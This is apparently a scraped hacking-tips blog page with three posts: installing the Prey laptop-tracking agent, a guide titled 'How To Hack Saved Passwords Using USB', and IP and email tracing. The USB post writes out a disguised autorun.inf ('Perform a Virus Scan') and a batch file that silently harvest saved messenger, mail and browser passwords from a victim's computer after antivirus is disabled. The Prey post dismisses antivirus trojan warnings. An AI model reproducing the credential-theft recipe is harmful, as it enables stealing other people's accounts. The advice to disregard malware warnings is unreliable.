How to Track Your Stolen Laptop

My friend recently bought a Toshiba laptop, but it was stolen within a couple days. The good thing is that i had installed a tracing software on his laptop the very same day he bought it, and he had no troubles finding it. This can happen to anyone which is using laptop, so having a tracing softwareinstalled on your laptop is not a bad idea.

Here i am showing you a free laptop tracing software called Prey.

Prey lets you keep track of your phone or laptop at all times, and will help you find it if it ever gets lost or stolen. It's lightweight, open source software, and free for anyone to use. And it just works.


How it Works?

Basically you install a tiny agent in your PC or phone, which silently waits for a remote signal to wake up and work its magic.

This signal is sent either from the Internet or through an SMS message, and allows you to gather information regarding the device's location, hardware and network status, and optionally trigger specific actions on it.

Notice: This file is Trojan as detected by some antivirus, but the thing is every such files are called trojan, as the process is to Track your system and view your systems reports. But be secure, this file is not harmful for your system or for your personal information. This software is made By PRey Project Company, and they take responsibility of it.

How to Download and Install Prey?

1. First of all download Prey project file from here.

2. After Downloading, Install the File and than

- They will ask for either standalone and +control panel.
- Go for +control panel, and than Click For New User.
- Give Your Name, Your Email and select Password to login the site.

E.g, Name :- John Smith
Email:-johnsmith@gmail.com
Password:-123456 (any Password that you choose) for Entering the site, and than press ok.

- You will get Email from prey project, just activate your account there, and click your device and do the following settings:

If you "on" any of the above settings than be sure to remember password of "lock pass". It will show as the tym you make it on. Just below the lock it will be written pass, and when alert is on the message will display whenever you login, "this laptop is stolen ...."-lol

So these were all steps now you can install and get secure. Now if its get stolen than you can track back

Remember: This still has demerit E.g, If theif formats your system completly than its no way possible to get back than to ask for police, and they don't track laptop normally, until the stolen system is related with some serious case.

How To Hack Saved Passwords Using USB

You must have gone through my earlier post “How to hack facebook account of a friend”. It was just a simple trick. This time, it’s a bit more powerful.

Have you ever imagined that a tiny USB/Pen Drive can be used as a deadly gadget for hacking passwords? Yes, it can be made possible. See below to find the truth.

The Windows operating system stores some of the mostly used passwords for the user for the general purposes. This includes a number of necessary applications:-
Useful and instant messenger MSN, AOL, g-talk etc.
The outlook express
SMTP, POP, FTP account
Auto-complete saved passwords for different web browsers like Internet Explorer, Firefox, google chrome etc.

Some applications/tools can be made to search for these saved passwords. All we need is a customized rootkit. Let’s see what will contain in our rootkit.

Massen Pass: It will recover all the passwords from the mostly used messenger applications like MSN Messenger, AOL Messenger, Yahoo Messenger, ICQ and many more.

Mail Pass view: It will recover the saved passwords from well-known e-mail clients like Microsoft Outlook express, Mozilla Thunderbird, Netscape Mail, IncrediMail, Eudora etc. Moreover, this Mail pass view can be used to recover the passwords of web-based e-mail accounts which include Hotmail, Yahoo!, Gmail etc. if the user is using the associated programs to access the accounts.

Procedure for creating the customized rootkit:

NOTE : For the creation steps, first disable the antivirus.
Extract the above discussed applications into the USB pendrive. Download link: secure
Create a notepad and just fill the content below into it.

ACTION= Perform a Virus Scan

Then save the notepad as autorun.inf and copy the newly created autorun.inf onto the USB pendrive.

* Then create another notepad and paste the content below onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start webbrowserpassview.exe /stext webbrowserpassview.txt

* Then save the said notepad file as launch.bat

* Copy the launch.bat to the USB pendrive as you have done earlier.

* That’s it. The rootkit is ready to operate and explore onto the victim’s computer.
Steps to follow:
After inserting the pendrive, an autorun window shall pop-up. Just select the first option of performing a virus scan.
Now all the pre-programmed applications will do their work of collecting passwords in the background and stored in .txt files.
Steps to safe yourself from these dirty tricks :

1. Don’t go for any pop-up provided scanning procedure. Always go for scanning by antivirus only from the antivirus window.

2. Keep your antivirus updated regularly.

Ip address Trace & Email Trace

• Ip address Trace

First of all you can find the routes which you follow to connect to a specific website by using the windows default command prompt:

1. Go to Start--Run and type cmd in the field.
2. In the command prompt type tracert www."any website". com where you write the website you want to trace and press Enter.
3. Here you can see all the routes your computer passes in order to reach the website you typed above.
4. The final IP obviously relates to the desired website of yours.

Now if you know a specific ip address you can find it's location by followind the steps:

1. Go to the ip-adress website.
2. Click on the IP-tracing link on the bottom of the page.
3. Complete the field with the desired ip address and find out where it comes from. 

• Email Trace

Apart from the IP address trace there is posibility to trace someone by his/her email.

1. In the ip-adress website follow the link Email Trace .
2. There is a box where you should paste the email header from the mail message.
3. Click here to find out about email header and how to find it in a specific message.
4. Finally click on the button "Trace email sender" and you will find out plenty info of the sender.
